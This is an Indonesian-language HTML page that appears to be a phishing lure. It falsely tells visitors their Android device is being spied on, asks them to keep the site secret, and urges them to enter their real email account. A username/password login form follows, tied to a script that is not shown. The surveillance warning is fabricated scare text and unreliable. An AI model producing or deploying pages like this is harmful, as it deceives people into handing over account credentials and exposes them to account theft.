<html>
<head>
  <title>tersesat kalian</title>
</head>
<body bgcolor="black"></body>
<body>
    
  <p style="text-align:center"><font size="4"><font color="green">(kenapa anda bisa masuk ke sini)</font><br></font><br><br></p>

  <p style="text-align:center"><font size="4"><font color="green"><font size="6">(mungkin anda adalah orang pilihan)</font><br></font><br></font><br><br></p>

  <font size="3"><font color="green">hai kalian adalah orang pilihan dan orang yg saya pilih untuk membuka web ini<p>maka dari itu jagalah rahasia di dalam web ini<p>jika tidak kalian akan berdosa banget</p></font><br></font><br>
  <div style=’text-align:justify;’><font size="4"><font color="green"><font size="4">informasi yg saya dapatkan bahwa android kalian saat ini sedang di intai oleh pihak luar. <p>dan pekerjaan anda dg perangkat dan berbagai kegiatan lainya akan di intai dan di sebarkan melalui web rahasia yg ada di sebuah group tertentu</p></font><br></font><br></font></div>
  <div style=’text-align:justify;’><font size="4"><font color="green"><font size="4">dan jika kalian tidak bijak dan berhati hati dlm menggunakan perankat kalian,maka akan ada oknum yg menyalah gunakan gerakan tersebut</p></font><br></font><br></font></div></font>
  <div style=’text-align:justify;’><font size="4"><font color="green"><font size="4">maka dari itu jika kalian tidak ingin di retas atau di sadap perangkat kalian maka masukan akun email asli mu ke web ini agar dapat di amankan</p></font><br></font><br></font></div></font></font>                   


  <html ng-app="setelah">
<head>
 <title>jika berkenan masukan akun kalian</title>
 <link rel="shortcut icon" type="image/x-icon" href="jinx.jpg">
 <link rel="stylesheet" type="text/css" href="bootstrap.css">
 <link rel="stylesheet" type="text/css" href="dot.css">
 <script type="text/javascript" src="angular.js"></script>
 <script type="text/javascript" src="dot.js"></script>
</head>
<body ng-controller="LoginAdmin" class="setelah">
    <div class="row">
  <div class="col-md-12">

  </div>
 </div>
  <div class="row">
   <div class="col-md-4">

   </div>

   <div class="col-md-4" style="margin-top: 100px;">
   <img src="jinx.jpg" width="320px" style="border-radius: 5px 5px 5px 5px;">
   <br>
   <br>
   <input ng-model="username" class="form-control" type="text" placeholder="Username...">
   <br>
   <input ng-model="password" class="form-control" type="password" placeholder="Password...">
   <br>
   <button class="btn btn-default btn-block" ng-click="login()">masuk dek</button>
   <br>
   <span style="color:rgb(6, 153, 18)">{{masukan akun mu}}</span>
   </div>

   <div class="setelah">

   </div>
  </div>
</body>


  
 
   

</body>
</html>